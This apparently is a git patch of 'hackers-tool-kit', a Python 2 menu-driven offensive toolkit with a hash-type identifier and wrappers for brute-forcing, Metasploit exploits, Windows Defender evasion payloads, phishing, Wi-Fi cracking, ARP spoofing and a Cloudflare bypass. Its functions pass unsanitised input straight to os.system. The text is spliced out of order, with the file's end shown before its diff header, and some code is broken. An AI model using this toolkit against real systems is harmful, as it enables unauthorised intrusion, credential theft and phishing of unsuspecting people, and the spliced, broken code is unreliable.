hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - -#ABOUT ME / THE CREATOR START# -#----------------------------# -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -#--------------------------# -#ABOUT ME / THE CREATOR END# - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From ec9cb0f21c0620860519d44cb11b0f5fac7a3b51 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 7 Apr 2019 12:45:24 -0500 Subject: [PATCH 090/214] Add files via upload --- htk.py | 2506 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2506 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..13bf464 --- /dev/null +++ b/htk.py @@ -0,0 +1,2506 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ 